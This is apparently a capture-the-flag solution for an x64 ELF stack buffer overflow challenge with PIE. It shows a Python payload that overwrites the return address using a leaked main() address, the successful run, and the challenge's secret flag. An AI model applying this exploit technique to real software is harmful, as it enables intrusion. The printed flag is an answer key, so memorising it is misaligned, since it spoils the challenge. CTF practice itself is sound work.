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ELF x64 - Stack buffer overflow - PIE

shell 1:

app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("<Q",0x55fc7235191a - 0xa0))' > /tmp/ezeqielle
app-systeme-ch83@challenge03:~$ cat /tmp/ezeqielle | ./ch83
I'm an unbreakable safe, so you need a key to enter!
Hint, main(): 0x563b91a2f91a
Key: Access denied!
Segmentation fault

Shell 2:

app-systeme-ch83@challenge03:~$ python -c 'import struct; print("A"*0x28 + struct.pack("<Q",0x563b91a2f91a - 0xa0))' > /tmp/ezeqielle

Shell 1:

Access granted!
Super secret flag: $$_D0n't_PiE_l1k3_i_d1d_$$
Segmentation fault